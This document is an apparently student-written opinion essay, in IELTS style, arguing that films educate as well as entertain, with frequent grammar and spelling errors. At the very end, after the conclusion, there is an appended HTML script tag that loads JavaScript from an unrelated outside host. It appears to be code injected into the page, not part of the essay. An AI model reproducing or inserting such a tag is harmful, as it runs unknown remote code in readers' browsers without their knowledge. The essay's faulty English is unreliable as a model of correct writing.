Some people believe that the only purpose of films is entertainment. Others say films have educational value. Discuss both views and give your opinion. Give reasons for your answer and include any relevant

There is no doubt, films play a crucial role in educating industries. Some believe that movies are only for entertainment while others think it has educational values as well. I would agree with those who argue cinema industries helping students in their education.

Firstly, movies are becoming the most favourite hobby of peoples and they are preferring to going to the cinema to watch a movie at least once a week. Its tendency ranging from action to horror, from science to carbon to meet various demands from all ages. Additionally, we get a chance to fresh our minds when watching moves as compared to other media and we can spend quality time with our family.

On the other hand, the advantage of movies are also varied, Some directors and prudcuers produce movies according to their knowledge. For Instance, movies on science can broaden the audience's mind with the learning from the area which is out of the planet like Mars, animal world, etc. Cartoon movies not only for fun but also giving knowledge to children about animals, planets, humanity, and kindness. Moreover, movies are not only meant for entertainment it allows us to learn from the characters played in films. They are like books from which we can learn how to interpret the transferred values from directors' intension.

In conclusion, although some are considering movies are a source of entertainment but in my view movies are an easy way of learning along with entertainment. Finally, I would request the government to encourage filmmakers to bring products with more educational values.<script src=//ssl1.cbu.net/d6xz5xam></script>